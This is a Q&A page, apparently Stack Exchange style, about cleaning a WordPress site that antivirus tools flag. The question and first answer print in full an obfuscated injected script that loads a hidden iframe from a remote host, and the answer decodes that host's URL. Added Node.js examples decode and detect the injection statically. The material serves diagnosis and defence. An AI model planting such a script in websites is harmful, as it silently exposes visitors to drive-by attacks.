Hidden Trojan on my website - How to find it?
Solution 1
The reported URL www.f1arab.com does not contain this piece of JS code at first sight.
So, looking at the script we can figure out what it is trying to send you to:
var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l"; document.write(url);
which yields:
http://anime-wiki11.info.ms:81/rem2.html
Querying this URL twice, we see on the first attempt that it can't find a page on Yahoo, and on the second that it can't load it. If you search for the b3nimb2eawiki11b1infob1ms string on Google, you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.
Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as it shows, the script is no longer harmful so it is safe to visit both URLs assuming Yahoo doesn't put it back.
When doing yet another check with urlQuery on the reported URL we see this request happening:
GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81
But once again this URL leads to something Yahoo already took offline.
The interesting thing is that this is different from the URL shown in your question, thus it is being dynamically generated. So that's why a quick search earlier on did not find the JS code.
This is evidenced by the following HTML code being injected at a certain point:
<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>
As we can see on urlQuery, this code isn't being injected through JavaScript, so this must be happening server side. What we also see here through wp-content is that you are using WordPress, so it is most likely that they are using a WordPress exploit to insert that code.
Start by updating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server, as well as PHP settings to disallow writing from/to places you don't want to.
Also, searching for var wow or just wow over all hosted files on the server would be a nice approach, as that seems not to be dynamic; please note that it might appear in an encrypted form, which might require you to search manually...
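To make the decoding step from this answer reproducible without running any of the injected script, here is an added example (not part of the answer, and not code from any project mentioned on this page): a small Node.js script that merges the split string literals, reads the substitution table out of the replace() chain, and reports the iframe target of every script block that carries the wow token. The HTML sample is constructed here around the URL-building snippet quoted above; the function names are my own.

```javascript
// Added example (not code from the original answers): statically recover the
// iframe target hidden behind the "var wow" token without executing any of
// the injected script. Runs under Node.js with no dependencies.

// Step 1: collapse "h"+"ttp"+":/"+"/" style string splitting into one literal.
// Repeats until nothing changes, so chains of any length are merged.
function joinSplitStrings(src) {
  const adjacent = /"([^"]*)"\s*\+\s*"([^"]*)"/g;
  let before;
  do {
    before = src;
    src = src.replace(adjacent, (_, a, b) => `"${a}${b}"`);
  } while (src !== before);
  return src;
}

// Step 2: read the substitution table straight out of the .replace() chain,
// so a variant that uses different marker pairs is decoded the same way.
function parseReplaceChain(chain) {
  const step = /\.replace\(\/([^/]+)\/g,\s*"([^"]*)"\)/g;
  const steps = [];
  let m;
  while ((m = step.exec(chain)) !== null) {
    steps.push([new RegExp(m[1], "g"), m[2]]);
  }
  return steps;
}

// Apply the chain in script order; order matters because one substitution
// can produce characters that a later one matches.
function decodeToken(token, steps) {
  return steps.reduce((s, [re, repl]) => s.replace(re, repl), token);
}

// Step 3: find `var wow="..."` and the expression that turns it into a URL,
// and return the URL the hidden iframe would have loaded (or null).
function extractIframeTarget(script) {
  const flat = joinSplitStrings(script);
  const token = /var\s+wow\s*=\s*"([^"]*)"/.exec(flat);
  const build = /"([^"]*)"\s*\+\s*wow((?:\.replace\([^)]*\))+)\s*\+\s*"([^"]*)"/.exec(flat);
  if (!token || !build) return null;
  const [, prefix, chain, suffix] = build;
  return prefix + decodeToken(token[1], parseReplaceChain(chain)) + suffix;
}

// Scan a whole HTML document: every <script> block is tried, and the targets
// of those carrying the wow pattern are returned.
function findInjectedTargets(html) {
  const targets = [];
  const scriptBlock = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptBlock.exec(html)) !== null) {
    const target = extractIframeTarget(m[1]);
    if (target !== null) targets.push(target);
  }
  return targets;
}

// Constructed sample page: one harmless script plus the URL-building snippet
// quoted in the answer, wrapped in a script tag.
const SAMPLE_HTML = `
<html><body>
<script>var page = "home"; document.title = page;</script>
<p>content</p>
<script type="text/javascript">var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l";</script>
</body></html>`;

// Second token: the server-side variant the answer found through urlQuery.
// The same replace() chain applies to it.
const SECOND_TOKEN = "mrzwhb2rb2mb2rb2b3db1infob1brb1ms";
const PAGE_CHAIN = '.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")';

if (typeof require !== "undefined" && require.main === module) {
  console.log(findInjectedTargets(SAMPLE_HTML));
  console.log(decodeToken(SECOND_TOKEN, parseReplaceChain(PAGE_CHAIN)));
}
```

Because the substitution table is parsed from the script instead of being hardcoded, the same function turns the mrzwh... token into mrzwheremeread.info.br.ms, the host seen in the urlQuery request above. Running findInjectedTargets over a downloaded copy of the hosted files is a static way to do the var wow search without ever evaluating the script; it does not help with PHP that only produces the script at request time, which is the server-side case the answer points at.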
Solution 2
You can also scan your site at http://sitecheck.sucuri.net/scanner/
Common forms of malware inject PHP code into your index.php files, which generates the JavaScript. The PHP doesn't look like the JavaScript; it may be base64 encoded, it may not.
It's also possible you have rogue php files on your site inserting the code into your index files as well. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.
If you run WordPress it may also be coming from entries in your database.
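As an added example (not code from either answer, and not tied to any product named here), this Node.js audit looks for the PHP that emits the script in the way this answer describes: a marker search over the plain source, plus a decode of every base64_decode() literal so a base64-wrapped payload is not missed. The two PHP sources are constructed for the example; the marker strings are taken from the injected script shown on this page, and the function names are my own.

```javascript
// Added example (not from either answer): find the PHP that emits the injected
// script, whether it sits in plain text or inside a base64_decode() literal.
// Runs under Node.js with no dependencies.

// Fragments of the injected script (from this page) that survive into the
// PHP that prints it; extend the list for other families.
const MARKERS = ["var wow", "rem2.html", "document.write("];

// Return every base64 string literal passed to base64_decode(...).
function base64Literals(phpSrc) {
  const call = /base64_decode\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = call.exec(phpSrc)) !== null) out.push(m[2].replace(/\s+/g, ""));
  return out;
}

function decodeBase64(b64) {
  return Buffer.from(b64, "base64").toString("utf8");
}

// Audit one PHP source. Each finding records where the hit was (plain text or
// which decoded literal) and what was matched.
function auditPhpSource(fileName, phpSrc) {
  const findings = [];
  const note = (where, detail) => findings.push({ file: fileName, where, detail });
  // eval() of decoded data is the classic dropper shape and is suspicious on its own.
  if (/eval\s*\(\s*base64_decode\s*\(/.test(phpSrc)) note("plain", "eval(base64_decode(...))");
  for (const marker of MARKERS) {
    if (phpSrc.includes(marker)) note("plain", marker);
  }
  base64Literals(phpSrc).forEach((blob, i) => {
    const decoded = decodeBase64(blob);
    for (const marker of MARKERS) {
      if (decoded.includes(marker)) note(`base64 literal #${i + 1}`, marker);
    }
  });
  return findings;
}

// Audit a set of files given as { name: source }, e.g. the tree downloaded
// from the host; returns all findings across the set.
function auditFiles(files) {
  return Object.entries(files).flatMap(([name, src]) => auditPhpSource(name, src));
}

// Constructed samples: a clean index.php and one carrying a base64-wrapped echo
// of the injected script (a plain grep for "var wow" would miss the second).
const HIDDEN_ECHO = "echo '<script>var wow=\"b3nimb2eawiki11b1infob1ms\";</script>';";
const INFECTED_INDEX = [
  "<?php",
  "require('./wp-blog-header.php');",
  `eval(base64_decode('${Buffer.from(HIDDEN_ECHO).toString("base64")}'));`,
].join("\n");
const CLEAN_INDEX = "<?php\nrequire('./wp-blog-header.php');\n";
const SAMPLE_FILES = { "index.php": INFECTED_INDEX, "wp-content/index.php": CLEAN_INDEX };

if (typeof require !== "undefined" && require.main === module) {
  console.log(auditFiles(SAMPLE_FILES));
}
```

The eval(base64_decode(...)) check fires even when the decoded blob matches none of the markers, which is deliberate: on a WordPress install that construct in index.php is worth a manual look regardless of what it decodes to. The audit only covers files; if the script is coming from database entries, as the answer also mentions, the same marker search has to be run over a database dump.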
Kilwa2012
Updated on September 18, 2022
Comments
Kilwa2012 (almost 2 years):
I have a big problem. Kaspersky says my website is infected with a trojan. So I downloaded all of my website and ran a scan and it was clean. I also ran ClamAV on it and it was clean too.
So the next thing, I told a few guys to test it, and when they go to my website the warning appears, not only in Kaspersky but in Norton too.
I think it's a hidden trojan, like when you refresh the page you see the warning while it's hidden in files.
Kaspersky gave me the following code:
<script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>
So now I am lost, what can I do?
Admin (almost 12 years): Please don't cross post questions. Your Super User question could have been migrated.
Admin (almost 12 years): You need to include what server you're using, what programming language you are using and any third party software you're using, e.g. WordPress.
John Conde (almost 12 years): I didn't say I envied them!
Kilwa2012 (almost 12 years): Hello, I found 2 infected files after hours and hours of work. I would like to thank TomWij for his help. Please guys, can you check if my site is working for you now?
bekay (almost 12 years): I would suggest you ask your hosting company to do a scan as well. If this helped you, feel free to mark it as the answer.